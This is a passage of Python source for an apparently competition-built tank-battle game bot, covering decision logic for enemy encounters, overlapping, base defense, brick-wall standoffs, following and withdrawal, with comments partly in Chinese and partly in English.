battler.get_route_to_enemy_by_move(oppBattler) if _route.is_not_found(): _route = battler.get_route_to_enemy_by_move(oppBattler, block_teammate=False) assert not _route.is_not_found(), "route not found ?" # 必定能找到路! assert _route.length > 0, "unexpected overlapping enemy" if _route.length == 1: # 双方相邻,选择等待 # 此处首先延续一下对射状态 if (player.has_status_in_previous_turns(Status.OPPOSITE_SHOOTING_WITH_ENEMY, turns=1) # 上回合正在和对方对射 and not battler.canShoot # 但是我方本回合不能射击 and not oppBattler.canShoot # 并且对方本回合不能射击 ): player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY) # 保持对射状态,用于后方打破僵持 player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY elif _route.length > 2: # 和对方相隔两个格子以上 if player.is_safe_to_close_to_this_enemy(oppBattler): # 可以安全逼近 action = battler.move_to(oppBattler) player.set_status(Status.READY_TO_BLOCK_ROAD) # 可以认为在堵路 ... 
return action else: player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY # 否则只好等额爱 else: # _route.length == 2: # 相距一个格子,可以前进也可以等待,均有风险 #---------------------------------------- # 1. 如果对方当前回合无法闪避,下一回合最多只能接近我 # - 如果对方下回合可以闪避,那么我现在等待是意义不大的,不如直接冲上去和他重叠 # - 如果对方下回合仍然不可以闪避,那么我就选择等待,反正它也走不了 # 2. 如果对方当前回合可以闪避,那么默认冲上去和他重叠 # - 如果我方可以射击,那么对方应该会判定为闪避,向两旁走,那么我方就是在和他逼近 # - 如果我方不能射击,对方可能会选择继续进攻,如果对方上前和我重叠,就可以拖延时间 # # TODO: # 好吧,这里的想法似乎都不是很好 ... # 能不防御就不防御,真理 ... # """if len( oppBattler.try_dodge(battler) ) == 0: # 对手当前回合不可闪避,当然我方现在也不能射击。现在假设他下一步移向我 action = oppBattler.move_to(battler) # 对方移向我 if map_.is_valid_move_action(oppBattler, action): map_.simulate_one_action(oppBattler, action) # 提交模拟 if len( oppBattler.try_dodge(battler) ) == 0: # 下回合仍然不可以闪避,说明可以堵路 map_.revert() player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY map_.revert() # 否则直接冲上去 if player.is_safe_to_close_to_this_enemy(oppBattler): # 可以安全移动 moveAction = battler.move_to(oppBattler) player.set_status(Status.READY_TO_BLOCK_ROAD) # 可以认为在堵路 return moveAction else: # 冲上去不安全,那就只能等到了 player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY else: # 对手当前回合可以闪避,那么尝试冲上去和他重叠 # TODO: # 可能弄巧成拙 5cca97a4a51e681f0e8ad227 # # 这个问题需要再根据情况具体判断! # ''' if player.is_safe_to_close_to_this_enemy(oppBattler): # 可以安全重叠 moveAction = battler.move_to(oppBattler) player.set_status(Status.READY_TO_BLOCK_ROAD) return moveAction else: # 有风险,考虑等待 player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY ''' # # TODO: # 是否应该根据战场情况进行判断,比如停下来堵路对方一定无法走通? # # 假设自己为钢墙然后搜索对方路径? # player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY""" player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY # 似乎没有比这个这个更好的策略 ... 
# 对方可以射击 else: if battler.canShoot: # 优先反击 player.set_status(Status.READY_TO_FIGHT_BACK) if battler.on_the_same_line_with(oppBattler, ignore_brick=False): player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY) # 触发对射状态 return battler.shoot_to(oppBattler) # 不能反击,只好闪避 actions = battler.try_dodge(oppBattler) if len(actions) == 0: player.set_status(Status.DYING) # 凉了 ... action = Action.STAY elif len(actions) == 1: action = player.try_make_decision(actions[0]) else: # len(actions) == 2: action = player.try_make_decision(actions[0], player.try_make_decision(actions[1])) if Action.is_move(action): # 统一判断 player.set_status(Status.READY_TO_DODGE) return action # 否则就凉了 ... player.set_status(Status.DYING) return Action.STAY # # 回撤模式 #------------ # 1. 优先回撤 # 2. 如果处在守卫状况,根据所处位置,选择反击或堵路 # elif status == Status.WITHDRAW: base = map_.bases[battler.side] if not battler.is_closest_to(base): with player.create_snapshot(): decision = WithdrawalDecision(player, signal) action = decision.make_decision() if decision.is_handled(action): with map_.simulate_one_action(battler, action): if oppTank not in battler.get_enemies_around(): # 安全行为 return # 留给 withdraw 处理 else: # 现在我方坦克已经处在基地附近 with player.create_snapshot(): decision = BaseDefenseDecision(player, signal) action = decision.make_decision() if decision.is_handled(action): # 符合 base defense 的条件 with map_.simulate_one_action(battler, action): if oppTank not in battler.get_enemies_around(): # 安全行为 return # 留给 base defense # # 否则就是不安全行为,应该予以反击 # if battler.canShoot: player.set_status(Status.READY_TO_FIGHT_BACK) return battler.shoot_to(oppBattler) elif oppBattler.canShoot: # 否则应该闪避 for action in battler.try_dodge(oppBattler): player.set_status(Status.READY_TO_DODGE) return action if oppBattler.canShoot: player.set_status(Status.DYING) # 不然就凉了 ... 
# 最后就等待 return Action.STAY #{ END 'decision/single/encount_enemy.py' }# #{ BEGIN 'decision/single/overlapping.py' }# class OverlappingDecision(SingleDecisionMaker): """ 与敌人重合时的决策 ------------------------ 侵略模式 -------- 1. 直奔对方基地,有机会就甩掉敌人 防御模式 -------- 1. 尝试回退堵路 2. 对于有标记的敌人,考虑采用其他的策略,例如尝试击杀敌军 多回合僵持后,会有主动打破重叠的决策 """ def _make_decision(self): player = self._player signal = self._signal map_ = player._map tank = player.tank battler = player.battler Tank2Player = type(player) BattleTank = type(battler) if battler.has_overlapping_enemy(): player.set_status(Status.ENCOUNT_ENEMY) player.set_status(Status.OVERLAP_WITH_ENEMY) oppTank = battler.get_overlapping_enemy() oppBattler = BattleTank(oppTank) oppPlayer = Tank2Player(oppBattler) if not player.has_status(Status.WITHDRAW): _allowWithdraw = ( WithdrawalDecision.ALLOW_WITHDRAWAL and not player.has_label(Label.DONT_WITHDRAW) ) status = evaluate_aggressive(battler, oppBattler, allow_withdraw=_allowWithdraw) player.set_status(status) else: status = Status.DEFENSIVE # 看作是防御 # # 先检查对方上回合是否在跟随我移动,以及时切换决策模式 ... # 5cd3f56d86d50d05a0083621 / 5ccec5a6a51e681f0e8e46c2 / 5ce26520d2337e01c7a3ca2b #------------------------------- if (player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=1) and Action.is_move(player.get_previous_action(back=1)) ): oppPlayer.add_labels(Label.BREAK_OVERLAP_SIMULTANEOUSLY) if (oppPlayer.has_label(Label.BREAK_OVERLAP_SIMULTANEOUSLY) and player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=3) and all( Action.is_stay(player.get_previous_action(_back)) for _back in range(1, 3+1) ) ): # 如果和一个带有跟随重叠标记的敌人僵持超过 3 回合,就把这个标记移除,因为它此时已经不是一个会和我马上打破重叠的敌人了 oppPlayer.remove_labels(Label.BREAK_OVERLAP_SIMULTANEOUSLY) # 5ce3c990d2337e01c7a54b4c if (oppPlayer.has_label(Label.BREAK_OVERLAP_SIMULTANEOUSLY) and Action.is_shoot(player.get_previous_action(back=1)) and Action.is_shoot(oppPlayer.get_previous_action(back=1)) # TODO: 是否有必要判断射击方向相同? 
): # 如果和一个带有跟随重叠标记的敌人在同一回合采用射击的方式打破重叠,则对这个行为进一步标记 oppPlayer.add_labels(Label.SIMULTANEOUSLY_SHOOT_TO_BREAK_OVERLAP) # # (inserted) 如果敌人带有立即打破重叠的标记,那么如果还能执行到这个地方,就意味着敌人 # 上次打破重叠的方向是回防(如果是进攻,那么应该不会再有机会遭遇) # # 那么在此处重新进入重叠的时候,尝试将对手击杀 # if not status == Status.DEFENSIVE: # 防御模式不触发? if (oppPlayer.has_label(Label.IMMEDIATELY_BREAK_OVERLAP_BY_MOVE) and not player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY) # 上回合不重叠 ): action = battler.get_next_attacking_action() if Action.is_move(action): if battler.canShoot: player.set_status(Status.READY_TO_BREAK_OVERLAP, Status.ATTEMPT_TO_KILL_ENEMY) return action + 4 # # (inserted) 观察到大多数人在遇到重叠时会选择直接无视对手,我们也可以学习一下这种决策 # 但是目前不想让这个决策成为必须,希望它只在特定的状况下被触发。 # # 对于非防御模式下,考虑这样三种情况: # ------------------------------------- # 1. 假设我方当前进攻路线距离领先一步 ,如果对方主动打破重叠,这时,如果对方下一步可以闪避, # 而我方当前回合不饿能闪避,必须要还击(之所以必须要射击是因为我们考虑最坏的情况,假设 # 对方这回合会还击,如果我方这时候不还击就会被打掉),假如对方这回合闪避了,并且恰好沿着进攻 # 方向闪避,那么结束后对方将比我方领先一步,这时候即使再继续攻击,结局也很可能是输, # 因此这步可以考虑主动打破重叠 # # 2. 假设我方当前进攻路线长度与敌方相同,假设对方主动打破重叠,假设对方可以闪避并且可以向着 # 进攻方向闪避,那么对方很有可能比我方快一步,此时应该主动打破重叠。假如对方不能向着进攻方向 # 闪避,那么认为敌人一定会还击,此时考虑我方下回合是否可以向着进攻方向闪避,如果不可以的话, # 我方就和对方差一步,处于劣势,那么就主动打破重叠。 # # 3. 假设对方比我方领先一步,这种情况下多属于对方处在我方阵营,我方很可能会触发防御模式 # 这种情况下就直接忽略掉吧 # route1 = battler.get_shortest_attacking_route() route2 = oppBattler.get_shortest_attacking_route() _shouldActiveBreakOverlap = False _enemyAttackAction = Action.STAY if route1.is_not_found() or route2.is_not_found(): # 虽然应该不可能,但是还是判断一下 pass else: _leadingLength = route2.length - route1.length # 我方领先步数 debug_print(battler, _leadingLength) action = battler.get_next_attacking_action(route1) if Action.is_shoot(action): # TODO: # 是否有必要考虑射击行为? 
pass elif _leadingLength == 1: # 情况一 allRoutes = oppBattler.get_all_shortest_attacking_routes() # # 由于不同的路线下一步可能会走到相同的地方,而造成的结果相同 # 因此此处将相同的行为进行缓存,为了减少判断次数 _consideredActions = set() for route in allRoutes: _enemyAttackAction = oppBattler.get_next_attacking_action(route) if _enemyAttackAction in _consideredActions: continue _consideredActions.add(_enemyAttackAction) if not Action.is_move(_enemyAttackAction): # 只考虑移动行为,因为,假如对方当前回合射击,那么我方下回合可以移动 # 这时双方距离可以认为相等,很有可能平局 continue # 提交地图模拟这步行为,这个时候双方应该均为僵持 with map_.simulate_one_action(oppBattler, _enemyAttackAction): # 考虑下回合我方是否可以闪避 with player.create_snapshot(): # 确保这种情况下决策不会再运行到这里,因为此时将不再和敌人重叠,于是不会遇到递归无终点 action, _ = player.make_decision(signal=signal) if action != battler.shoot_to(oppBattler): # 说明下回合我方可以闪避,那么就可以不管了 continue # 我方下回合不可以闪避,考虑敌人下回合是否可以闪避 with oppPlayer.create_snapshot(): action, _ = oppPlayer.make_decision() if action != oppBattler.shoot_to(battler): # 说明下回合敌人可以闪避 _shouldActiveBreakOverlap = True break elif _leadingLength == 0: # 情况二 allRoutes = oppBattler.get_all_shortest_attacking_routes() _consideredActions = set() for route in allRoutes: _enemyAttackAction = oppBattler.get_next_attacking_action(route) if _enemyAttackAction in _consideredActions: continue _consideredActions.add(_enemyAttackAction) if not Action.is_move(_enemyAttackAction): # TODO: # 仍然不考虑射击?为了防止无迭代终点? 
continue # 提交一步模拟,敌方应该比我方领先一步 with map_.simulate_one_action(oppBattler, _enemyAttackAction): # 考虑下回合敌方是否可以闪避 with oppPlayer.create_snapshot(): action, _ = oppPlayer.make_decision() if action != oppBattler.shoot_to(battler): # 敌方可以闪避 _shouldActiveBreakOverlap = True break # 对方下回合不可以闪避,那么考虑我方是否可以闪避 with player.create_snapshot(): action, _ = player.make_decision() # TODO: # 我方下回合可能是防御状态,这种情况下必定反击,判断不准确 # # 不过问题其实不大,因为这样就会触发主动打破重叠 # if action == battler.shoot_to(oppBattler): # 我方不能闪避 _shouldActiveBreakOverlap = True break else: # 其他情况,留作下一回合打破重叠 pass if _shouldActiveBreakOverlap: action = battler.get_next_attacking_action(route1) if Action.is_move(action): if player.is_safe_to_break_overlap_by_move(action, oppBattler): player.set_status(Status.READY_TO_BREAK_OVERLAP) player.set_status(Status.KEEP_ON_MARCHING) return action elif Action.is_shoot(action): # # 假设下一步射击,考虑最糟糕的一种情况,那就是敌人同一回合主动打破重叠,移动到我方身后 # 而我方无法闪避,那么就有被敌人击杀的风险 # _mayBeKilled = False with map_.simulate_one_action(oppBattler, _enemyAttackAction): with map_.simulate_one_action(battler, action): if len(battler.try_dodge(oppBattler)) == 0: # 无法闪避! _mayBeKilled = True if not _mayBeKilled: # 在没有被击杀风险的情况下可以采用射击 return action # 是否已经有多回合僵持,应该主动打破重叠 _shouldBreakOverlap = ( battler.canShoot # 可以射击 and player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=1) ) # 上回合重叠这回合还重叠,就视为僵持,趁早打破重叠 if status == Status.AGGRESSIVE: # 对方不能射击,对自己没有风险,或者是符合了主动打破重叠的条件 if not oppBattler.canShoot or _shouldBreakOverlap: # 尝试继续行军 action = battler.get_next_attacking_action() if Action.is_move(action): if _shouldBreakOverlap: # # 首先先处理主动打破重叠的情况的情况 # 该情况下会改用定制的安全性测试函数判断情况 # # TODO: # 优先尝试不往上回合已经移动过的方向移动 5ce26520d2337e01c7a3ca2b # realAction = action # # 如果遇到和我打破重叠时机一致的对手 #------------------- # 1. 尝试换一个方向移动 # 2. 如果不能换方向,那么可能在狭道内,那么退回原来的位置, # 这意味着如果敌人下回合开炮,那么他必死 5ce264c2d2337e01c7a3c9f6 # if oppPlayer.has_label(Label.BREAK_OVERLAP_SIMULTANEOUSLY): # # 禁止的行为不一定是反向!因为可能恰好遇到拐弯 ... 
# 5ce48707d2337e01c7a641b7 / 5ce487a6d2337e01c7a64205 # _backTurn = 0 previousAction = Action.STAY while Action.is_stay(previousAction): # 有可能上回合是等待,也就是 _backTurn += 1 # 上回合又下方决策得到,因此需要一直回查到移动行为 previousAction = player.get_previous_action(back=_backTurn) forbiddenAction = action revertMoveAction = (previousAction + 2) % 4 # 反向移动的行为 # # 尝试移向其他的方向 # # TODO: # 太难判断了,还是暂时先禁止把 ... 鬼知道对面怎么算的距离 # '''if realAction == forbiddenAction: route1 = battler.get_shortest_attacking_route() for optionalAction in battler.get_all_valid_move_actions(): if (optionalAction == forbiddenAction or optionalAction == revertMoveAction # 不要回头 ): continue with map_.simulate_one_action(battler, optionalAction): route2 = battler.get_shortest_attacking_route() if route2.length <= route1.length: # 移动后不增加攻击距离s realAction = optionalAction break''' # # 尝试反向移动 # # TODO: # 事实上反向移动也不一定是正确的,因为每一个人对于这种情况的判断是不一样的 # 5ce4943ed2337e01c7a64cdd # '''if realAction == forbiddenAction: with map_.simulate_one_action(battler, revertMoveAction): if len(oppBattler.try_dodge(battler)) == 0: # 如果这回合他反向射击,那么必死 realAction = revertMoveAction''' # # 否则等待,让敌人开一炮,这样下回合还会继续触发移动 # 有可能换一个敌方就可以有别的决策方法 # 也有可能直接带到基地 5ce48b77d2337e01c7a644e5 # if realAction == forbiddenAction: player.set_status(Status.OVERLAP_WITH_ENEMY) # 保持等待状况 return Action.STAY if player.is_safe_to_break_overlap_by_move(realAction, oppBattler): player.set_status(Status.READY_TO_BREAK_OVERLAP) player.set_status(Status.KEEP_ON_MARCHING) return realAction else: # 无法安全移动,但是又需要打破重叠,那么就视为防御 # 让后续的代码进行处理 player.remove_status(Status.AGGRESSIVE) player.set_status(Status.DEFENSIVE) pass # 这里会漏到 DEFENSIVE else: # 开始处理常规情况 realAction = player.try_make_decision(action) if Action.is_move(realAction): # 继续起那就 player.set_status(Status.KEEP_ON_MARCHING) return realAction # 否则就是等待了,打得更有侵略性一点,可以尝试向同方向开炮! 
realAction = player.try_make_decision(action + 4) if Action.is_shoot(realAction): player.set_status(Status.KEEP_ON_MARCHING) return realAction elif Action.is_shoot(action): # 下一步预计射击 realAction = player.try_make_decision(action) if Action.is_shoot(realAction): player.set_status(Status.KEEP_ON_MARCHING) return realAction else: # 否则停留 player.set_status(Status.KEEP_ON_OVERLAPPING) return Action.STAY else: player.set_status(Status.KEEP_ON_OVERLAPPING) return Action.STAY # 原地等待 if status == Status.DEFENSIVE or _shouldBreakOverlap: # 对方不能射击,对自己没有风险,或者是符合了主动打破重叠的条件 if not oppBattler.canShoot or _shouldBreakOverlap: # # 这里不只思考默认的最优路径,而是将所有可能的最优路径都列举出来 # 因为默认的最优路径有可能是破墙,在这种情况下我方坦克就不会打破重叠 # 这就有可能错失防御机会 # for enemyAttackRoute in oppBattler.get_all_shortest_attacking_routes(): oppAction = oppBattler.get_next_attacking_action(enemyAttackRoute) # 模拟对方的侵略性算法 if Action.is_move(oppAction) or Action.is_shoot(oppAction): # 大概率是移动 # 主要是为了确定方向 oppAction %= 4 # 首先先检查对方是否会跟随我 #-------------------------- # 1. 如果我方可以射击,对方不能射击,那么按照之前的经验,对方下回合会移动 # 这个时候尝试击杀 # if oppPlayer.has_label(Label.BREAK_OVERLAP_SIMULTANEOUSLY): if battler.canShoot: # 这回合可以射击,则改为射击 if (oppPlayer.has_label(Label.SIMULTANEOUSLY_SHOOT_TO_BREAK_OVERLAP) and oppBattler.canShoot # 如果带有这个标记,那么这回合就不要射击了,等待敌人打完这回合, ): # 下回合才有可能击杀 5ce50cd9d2337e01c7a6e45a player.set_status(Status.KEEP_ON_OVERLAPPING) return Action.STAY else: # 否则就考虑反身射击 player.set_status(Status.READY_TO_BREAK_OVERLAP, Status.ATTEMPT_TO_KILL_ENEMY) # 尝试击杀敌军 return oppAction + 4 else: pass # 均不能射击,那么将判定为没有风险。那就一起移动 # 正常情况下选择堵路 #---------------------- if player.is_safe_to_break_overlap_by_move(oppAction, oppBattler): # 模仿敌人的移动方向 player.set_status(Status.READY_TO_BREAK_OVERLAP) player.set_status(Status.READY_TO_BLOCK_ROAD) # 认为在堵路 return oppAction # 否则等待 player.set_status(Status.READY_TO_BLOCK_ROAD) player.set_status(Status.KEEP_ON_OVERLAPPING) return Action.STAY #{ END 'decision/single/overlapping.py' }# #{ BEGIN 'decision/single/base_defense.py' }# class 
BaseDefenseDecision(SingleDecisionMaker):
    """
    Proactive base defense.
    ---------------------
    No head-on encounter with an enemy is in progress; handle a special case first:
    when an enemy is about to attack our base, moving to intercept takes priority
    over predictive kills.  This kind of defense may be suicidal in nature.

    If the enemy faces our base THIS turn
    ----------------------------
    1. The enemy's shot is on cooldown and it will fire at our base next turn; if
       our tank can intercept with one move, move to intercept first.
    2. The enemy can shoot this turn and our tank can intercept with one move:
       intercept even at the cost of our tank (sacrifice).
    3. The enemy's shot is on cooldown, it fires next turn, and our tank needs two
       moves to intercept: attempt the (possibly suicidal) two-step interception.

    If the enemy may face our base NEXT turn
    ----------------------------
    1. The enemy will then certainly be able to shoot; if our tank can reach the
       blocking square with this turn's move, move there first.
    """
    def _make_decision(self):

        player  = self._player
        map_    = player._map
        battler = player.battler

        for oppBattler in [ _oppPlayer.battler for _oppPlayer in player.opponents ]:
            if oppBattler.destroyed:
                continue
            #
            # The enemy faces our base this turn
            #
            if oppBattler.is_face_to_enemy_base():
                if oppBattler.canShoot: # the enemy can shoot this turn
                    for action in battler.get_all_valid_move_actions():
                        with map_.simulate_one_action(battler, action):
                            if not oppBattler.is_face_to_enemy_base(): # no longer faces our base -> correct blocking move
                                player.set_status(Status.SACRIFICE_FOR_OUR_BASE)
                                return action
                else: # the enemy cannot shoot this turn
                    for action in battler.get_all_valid_move_actions(): # the enemy cannot shoot, so we may try moving two steps
                        with map_.simulate_one_action(battler, action):
                            if not oppBattler.is_face_to_enemy_base(): # blocked within a single move
                                player.set_status(Status.BLOCK_ROAD_FOR_OUR_BASE)
                                return action
                            else: # try a two-step interception
                                if map_.is_valid_move_action(battler, action): # must pre-check the second step is valid
                                    with map_.simulate_one_action(battler, action):
                                        if not oppBattler.is_face_to_enemy_base(): # two-step interception succeeded
                                            player.set_status(Status.SACRIFICE_FOR_OUR_BASE)
                                            return action
            else:
                #
                # The enemy may face our base next turn
                #
                for enemyAction in oppBattler.get_all_valid_move_actions():
                    with map_.simulate_one_action(oppBattler, enemyAction):
                        if oppBattler.is_face_to_enemy_base(): # the enemy faces our base after one move
                            for action in battler.get_all_valid_move_actions():
                                with map_.simulate_one_action(battler, action):
                                    if not oppBattler.is_face_to_enemy_base(): # moving first can prevent it
                                        player.set_status(Status.BLOCK_ROAD_FOR_OUR_BASE)
                                        return action

#{ END 'decision/single/base_defense.py' }#



#{ BEGIN 'decision/single/behind_brick.py' }#

class BehindBrickDecision(RespondTeamSignalDecisionMaker):
    """
    Applies to a standoff with an enemy on the other side of a brick wall.
    """
    # NOTE(review): the second handler below responds to
    # Signal.SUGGEST_TO_BACK_AWAY_FROM_BRICK, but this tuple lists
    # Signal.READY_TO_BACK_AWAY_FROM_BRICK instead -- confirm which signal the
    # team-signal dispatcher actually filters on.
    HANDLED_SIGNALS = ( Signal.PREPARE_FOR_BREAK_BRICK,
                        Signal.READY_TO_BACK_AWAY_FROM_BRICK, )

    def _make_decision(self):

        player = self._player
        signal = self._signal
        battler = player.battler
        BattleTank = type(battler)

        # The "prepare to break the brick" signal
        #--------------------------
        # Trigger conditions:
        #
        # 1. Both sides are in a standoff and, after we have opened an escape
        #    route, certain conditions force a wall break.
        # 2. The opponent has just moved away from behind the wall while we have
        #    an escape route; force a wall break in that case.
        #
        # On receiving this signal, first check whether we can dodge:
        #
        # 1. If we can dodge, reply with the "ready to break the brick" signal.
        # 2. If we cannot dodge, reply with the "preparing an escape route this turn" signal.
        #
        if signal == Signal.PREPARE_FOR_BREAK_BRICK:
            attackAction = battler.get_next_attacking_action() # only consider enemies on the attack route
            oppTank = battler.get_enemy_behind_brick(attackAction, interval=-1)

            '''_undoRevertTurns = 0
            while oppTank is None: # 对应于敌方刚离开的那种触发条件
                # 可能存在多轮回滚,因为别人的策略和我们的不一样!
                # 给别人回滚的时候必须要考虑多回合!
                map_.revert()
                _undoRevertTurns += 1
                oppTank = battler.get_enemy_behind_brick(attackAction, interval=-1)'''

            if oppTank is None:
                #
                # The enemy behind the brick is not necessarily behind our attack
                # route! 5ce3d1c0d2337e01c7a554e3
                # In that case this situation should be dropped.
                #
                res = ( Action.INVALID, Signal.UNHANDLED )
            else:
                player.set_status(Status.WAIT_FOR_MARCHING)      # used to trigger next turn
                player.set_status(Status.HAS_ENEMY_BEHIND_BRICK) # used to trigger next turn
                player.set_risky_enemy(oppTank) # re-register this enemy as the risky one!
                dodgeActions = battler.try_dodge(oppTank)
                if len(dodgeActions) == 0:
                    # Cannot dodge: prepare to dig through a wall instead
                    breakBrickActions = battler.break_brick_for_dodge(oppTank)
                    if len(breakBrickActions) == 0: # neither side is a brick wall
                        res = ( Action.STAY, Signal.CANHANDLED ) # cannot handle it; just wait
                    else:
                        player.set_status(Status.READY_TO_PREPARE_FOR_BREAK_BRICK)
                        res = ( breakBrickActions[0], Signal.READY_TO_PREPARE_FOR_BREAK_BRICK )
                else:
                    # We can dodge: reply to the team that the next step is the wall break
                    shootAction = battler.shoot_to(oppTank)
                    player.set_status(Status.READY_TO_BREAK_BRICK)
                    res = ( shootAction, Signal.READY_TO_BREAK_BRICK )

            '''for _ in range(_undoRevertTurns):
                map_.undo_revert()'''

            return res # always reply with a signal

        #
        # Prepare to back away in order to create a two-on-one situation
        #
        if signal == Signal.SUGGEST_TO_BACK_AWAY_FROM_BRICK:
            attackAction = battler.get_next_attacking_action() # only consider enemies on the attack route
            oppTank = battler.get_enemy_behind_brick(attackAction, interval=-1)

            if oppTank is None: # should not normally happen?
res = ( Action.INVALID, Signal.UNHANDLED ) else: player.set_status(Status.HAS_ENEMY_BEHIND_BRICK) action = battler.back_away_from(oppTank) realAction = player.try_make_decision(action) if Action.is_move(realAction): player.set_status(Status.READY_TO_BACK_AWAY_FROM_BRICK) res = ( realAction, Signal.READY_TO_BACK_AWAY_FROM_BRICK ) else: # 存在风险,也就是想要夹击的敌人有炮弹,那么就先等待一回合 res = ( Action.STAY, Signal.CANHANDLED ) return res # 必定回复一个信号 #{ END 'decision/single/behind_brick.py' }# #{ BEGIN 'decision/single/follow_enemy_behind_brick.py' }# class FollowEnemyBehindBrickDecision(SingleDecisionMaker): """ 跟随墙后敌人的逻辑 ----------------- 如果上回合敌人和我方隔墙僵持,然后敌人向两侧移动,为了防止敌人从旁边的墙突破, 这里添加一个主动跟随的逻辑,假如对方这回合破墙,那么我方这回合就会出现在对方墙后, 这样对方就无法进攻,甚至可以为我方进攻创造机会 5ce57677d2337e01c7a7c1ff """ def _make_decision(self): player = self._player map_ = player._map battler = player.battler Tank2Player = type(player) BattleTank = type(battler) if (player.has_status_in_previous_turns(Status.HAS_ENEMY_BEHIND_BRICK, turns=1) and not Action.is_move(player.get_previous_action(back=1)) ): # 上回合墙后有人 with map_.rollback_to_previous(): action = battler.get_next_attacking_action() if Action.is_stay(action): return oppTank = battler.get_enemy_behind_brick(action, interval=-1) # 找到墙后敌人 if oppTank is None: # 理论上不会存在? return oppBattler = BattleTank(oppTank) oppPlayer = Tank2Player(oppBattler) dodgeActions = oppBattler.try_dodge(battler) previousAction = oppPlayer.get_previous_action(back=1) if Action.is_stay(previousAction): return if previousAction in dodgeActions: # 敌人上回合从墙后闪开 realAction = player.try_make_decision(previousAction) # 尝试跟随敌人上回合的移动行为 if Action.is_move(realAction): with map_.simulate_one_action(battler, realAction): for field in battler.get_destroyed_fields_if_shoot(action): if isinstance(field, BrickField): # 确保跟随后还隔着墙 5ce90a90d2337e01c7abcd07 # 否则何必要跟随 ... 
player.set_status(Status.READY_TO_FOLLOW_ENEMY) return realAction # # 将动作连续化,如果对方连续移动,那么可以考虑跟随 # if player.has_status_in_previous_turns(Status.READY_TO_FOLLOW_ENEMY): oppTank = None with map_.auto_undo_revert() as counter: # 有可能要多回合回滚 while map_.revert(): counter.increase() action = battler.get_next_attacking_action() if Action.is_stay(action): continue oppTank = battler.get_enemy_behind_brick(action, interval=-1) if oppTank is not None: oppBattler = BattleTank(oppTank) oppPlayer = Tank2Player(oppBattler) break if oppTank is not None: # 理论上一定会找到敌人 previousAction = oppPlayer.get_previous_action(back=1) lastAction = player.get_previous_action(back=1) # 上回合一定跟随移动 # 确保敌人在贴着墙移动,否则就不必继续跟随了 if np.abs(previousAction % 4 - lastAction % 4) in (0, 2): # 两次移动方向或相反 realAction = player.try_make_decision(previousAction) # 尝试跟随敌人上回合行为 if Action.is_move(realAction): with map_.simulate_one_action(battler, realAction): for field in battler.get_destroyed_fields_if_shoot(action): if isinstance(field, BrickField): player.set_status(Status.READY_TO_FOLLOW_ENEMY) return realAction #{ END 'decision/single/follow_enemy_behind_brick.py' }# #{ BEGIN 'decision/single/withdrawal.py' }# class WithdrawalDecision(SingleDecisionMaker): """ 主动回撤逻辑 ------------- 如果我方大逆风,那么主动回防基地 具有一个持久性的记忆标签 KEEP_ON_WITHDRAWING 带有这个标签的 player 在决策的时候,比 WithdrawalDecision 优先级高的决策应该以 WITHDRAW 状态为优先 带有 WITHDRAW 持久标记的 player 决策必定会在此处终止,否则就要取消这个标记和状态, 让后续的决策继续进行 """ ALLOW_WITHDRAWAL = True # 一个测试用的 const,设为 False 则取消一切和 WITHDRAW 相关的决策 @CachedProperty def _GUARD_POINTS(self): """ 获得基地两个对角线位置的两个防御坐标 """ player = self._player map_ = player._map tank = player.tank side = tank.side base = map_.bases[side] _DIAGONAL_DIRECTIONS = ( (1, 1), (1, -1), (-1, 1), (-1, -1) ) x1, y1 = base.xy points = [] for dx, dy in _DIAGONAL_DIRECTIONS: x2 = x1 + dx y2 = y1 + dy if map_.in_map(x2, y2): points.append( (x2, y2) ) return points def _get_more_dangerous_guard_point(self, oppBattler): """ 更加危险的防御点,被认为是距离敌人更近的防御点 """ player = self._player 
        battler = player.battler

        _GUARD_POINTS = self._GUARD_POINTS
        distancesToEnemy = [ oppBattler.get_manhattan_distance_to_point(x2, y2)
                                for (x2, y2) in _GUARD_POINTS ]
        return _GUARD_POINTS[ np.argmin(distancesToEnemy) ] # the point closer to the enemy is judged the more dangerous one

    def _is_dangerous_action(self, action, oppBattler):
        """
        Whether taking `action` would let the enemy end up facing our base.

        Guards against situations such as 5ce9154fd2337e01c7abd81f and
        5cea5d38d2337e01c7ad8418:
        ----------------------------------
        1. If we move this turn and the enemy can face our base next turn through a
           non-shooting action (after shooting its gun cools down, so it poses no
           immediate threat to the base), while staying put this turn would prevent
           that, then we should stay.
        2. If we shoot this turn and the enemy can face our base next turn through
           a non-shooting action, then we should stay.
        3. If we break a wall first and the enemy then appears behind it, that also
           counts as a threat.
        """
        player = self._player
        battler = player.battler
        map_ = battler._map

        if (Action.is_move(action)
            and not oppBattler.is_face_to_enemy_base() # in fact this should never hold here
            ):
            # Record the candidate enemy action first, because simulating our own
            # action may reset the enemy's shooting availability.
            _shouldStay = False
            enemyAction = Action.STAY
            with map_.simulate_one_action(battler, action):
                for _action in oppBattler.get_all_valid_move_actions() + [ Action.STAY ]:
                    with map_.simulate_one_action(oppBattler, _action):
                        if oppBattler.is_face_to_enemy_base(): # after our move, the enemy faces our base
                            _shouldStay = True
                            enemyAction = _action
                            break
            if _shouldStay:
                # Now simulate only the enemy action (without ours) and check whether
                # the enemy would face our base in that case.
                with map_.simulate_one_action(oppBattler, enemyAction):
                    if not oppBattler.is_face_to_enemy_base():
                        return True

        if (Action.is_shoot(action)
            and not oppBattler.is_face_to_enemy_base() # the enemy was not facing our base last turn
            ):
            for _action in oppBattler.get_all_valid_move_actions() + [ Action.STAY ]:
                with map_.simulate_one_action(oppBattler, _action):
                    if not oppBattler.is_face_to_enemy_base(): # while the enemy is not yet facing our base
                        with map_.simulate_one_action(battler, action):
                            if oppBattler.is_face_to_enemy_base(): # after our shot, the enemy faces our base
                                return True # dangerous

        # Every other case is considered safe
        return False

    def _try_make_decision(self, action, oppBattler):
        """
        The withdraw-mode variant of try_make_decision.
        """
